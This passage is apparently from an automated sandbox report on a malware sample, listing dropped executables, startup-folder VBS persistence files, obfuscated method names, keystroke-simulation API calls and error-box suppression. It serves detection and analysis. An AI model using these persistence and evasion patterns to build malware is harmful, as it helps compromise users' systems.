                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_06967A20 push esp; ret 4_2_06967A21
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeCode function: 4_2_0696286F push es; retf 4_2_069628C8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_014D1EC0 push eax; ret 15_2_014D1ED4
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 15_2_014D1EC0 push eax; ret 15_2_014D1EFC
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00F21EC0 push eax; ret 18_2_00F21ED4
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 18_2_00F21EC0 push eax; ret 18_2_00F21EFC
                Source: 4.2.Dhy2kmz.exe.62c0000.7.raw.unpack, rgb0nTAMVKQaV4LlFt8.csHigh entropy of concatenated method names: 'hssA7noWMo', 'XGnAy40YRw', 'lSNAJY6Bpt', 'DrjAri4vv1', 'GtEADj9irW', 'oDEA4obrZq', 'dbAAd3PlCS', 'IUsAjFx1QF', 'BIuAlmZeMu', 'BxyAvQjgxm'
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeFile created: C:\Users\user\AppData\Roaming\Wnuth.exeJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\Dhy2kmz.exeJump to dropped file
                Source: C:\Users\user\Desktop\9876567899.bat.exeFile created: C:\Users\user\AppData\Local\preinhered\palladiums.exeJump to dropped file
                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbsJump to dropped file
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbsJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_0072F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0072F98E
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: 0_2_007A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007A1C41
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_0004F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0004F98E
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 2_2_000C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_000C1C41
                Source: C:\Users\user\Desktop\9876567899.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9876567899.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
